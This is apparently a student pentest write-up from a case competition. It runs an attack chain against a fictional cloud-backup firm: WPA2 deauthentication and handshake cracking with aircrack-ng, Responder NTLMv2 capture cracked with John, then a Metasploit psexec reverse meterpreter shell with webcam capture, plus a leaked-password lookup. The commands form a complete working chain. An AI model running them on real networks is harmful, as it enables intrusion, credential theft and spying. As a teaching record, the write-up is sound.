One Eyed Techs
This scenario, was written as a case competition for a cyber security presentation. The presentation treated the scenario as a penetration test of an online company, offering backups in the cloud. The name of the company is Digi-Sikring ApS.
No laws were broken in creating and documenting this scenario. All tests were performed on my private property.
The following segment of the scenario is executed as an external threat agent.
Part 1: Got wifi?
First step is to enable monitor mode on the network interface card.
root@parrot:~$ sudo airmon-ng start wlan0
Next up, I'm scanning wireless networks with the network card in monitor mode.
This is done with the following command:
root@parrot:~$ sudo airodump-ng wlan0mon
While scanning, a network called digisikringaps-2.4Ghz appears.
The next step is to narrow down monitoring, to the network in interest. With the following command, the network: digisikringaps-2.4Ghz is monitored, and the data is saved to the Desktop.
root@parrot:~$ sudo airodump-ng -c 1 --bssid E0:B9:E5:A5:4D:27 -w /home/root/Desktop/digisikringaps-wifi wlan0mon
The files with the captured data are stored on the Desktop. The most important being the .cap file. However, It's far more interesting once it contains the four way handshake, which is the authentification method for network with WPA2 encryption.
To capture the four way handshake, a device is needed to authenticate with the network. Instead of waiting for said authentication, a deauthentication attack can be launched against connected devices. This forces devices off of the network. They will most likely auto-connect, enabling me to capture the handshake. To launch the deauthentication attack to the only device connected, the following command is executed:
root@parrot:~$ sudo aireplay-ng -0 2 -a E0:B9:E5:A5:4D:27 -c 84:29:99:18:CD:33 wlan0mon
The attack was succesful and the terminal monitoring the network now displays the capture of the four way handshake.
If the .cap-file is opened in Wireshark and the four way handshake can be seen. It employs EAPOL (extensible authentication protocol over LAN), which is the authentification protocol.
The password within the .cap file, can be cracked with the aircrack software from the aircrack-ng suite. This allows the attacker to bruteforce the password with words from a password list.
The command executed is as follows.
root@parrot:~$ sudo aircrack-ng -a2 -b E0:B9:E5:A5:4D:27 -w /usr/share/wordlists/fern-wifi/common.txt /home/root/Desktop/digisikringaps-wifi/*cap
Since the wireless network password is in the wordlist used, it is cracked within seconds.
Part 2: Houston, we have a shell
After connecting to the network, I'd like to determine the default gateway in order to discover hosts connected to the network.
root@parrot:~$ route -n
The default gateway is 192.168.1.1. To discover connected hosts I'll scan every IP address on the network. To do this I'll use nmap.
root@parrot:~$ sudo nmap -sP -PI -PT 192.168.1.0/24
The connected device with IP: 192.168.1.112, looks like a Windows machine. Let's target that. To attack the device, I'll use responder. When a non existing hostname is entered into a browser, the computer will ask other devices connected to the network, if they recognize the hostname. Responder tells the computer that itself is the IP behind the unrecognized hostname, resulting in the target computer is sending their login credentials. The name in cleartext and the password in a hashed with NTLMv2.
root@parrot:~$ sudo responder -I wlan0 -wv
The hashes are stored in /usr/share/responder/logs.
root@parrot:~$ cd /usr/share/responder/logs
I'll use john the ripper to attempt cracking the NTLMv2 hash.
root@parrot:~/usr/share/responder/logs$ john SMBv2-NTLMv2-SSP-192.168.1.112.txt
John cracked the NTLMv2 Hash in under a second. This emphasizes the importance of not relying on a weak password.
The psexec allows for authenticated remote code execution on a target system. Let's use a reverse shell as payload to execute.
First some parameters are to be set.
msf > use exploit/windows/smb/psexec msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(windows/smb/psexec) > set smbroot johs msf exploit(windows/smb/psexec) > set smbpass password1 msf exploit(windows/smb/psexec) > set lhost 192.168.1.162 msf exploit(windows/smb/psexec) > set rhost 192.168.1.112
msf exploit(windows/smb/psexec) > exploit
We're in. Printing working directory let's us know that we have a shell open in C:\Windows\System32.
Furthermore, we can launch Armitage, a graphical root interface for the metasploit framework, and grab a picture through the webcam of the compromised computer.
Part 3: Correct horse battery stable
The third part is an example of compromisation of an employee from the outside. Using maltego, we can search the employers name.
An e-mail is associated with the name of the employee. Digging a little deeper, it appears that the e-mail of the employee has been in a password leak.
Obtaining the LinkedIn database let's ud find the SHA1 hash of used password.
The SHA1 hash is not considered safe as per 2018. Searching the hash in online databases, revealed that the hash indeed had been cracked.
This concludes the hypothetical pentest done as a case competition.